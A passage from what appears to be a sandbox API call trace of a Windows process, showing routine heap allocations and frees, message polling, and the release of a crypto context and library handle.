| out: hHeap=0x970000) returned 1 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.646] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.646] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0251.646] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.646] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0251.646] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0251.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.647] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0251.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0251.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.647] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0251.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0251.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0251.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.650] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0251.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0251.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0251.650] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.651] FreeLibrary (hLibModule=0x756e0000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0251.651] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0251.651] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0251.651] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0251.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0251.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.652] CloseHandle (hObject=0x2a0) returned 1 [0251.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0251.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0251.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0251.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.656] CloseHandle (hObject=0x2d0) returned 1 [0251.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0251.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0251.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0251.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0251.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0251.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0251.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0251.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0251.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0251.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0251.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 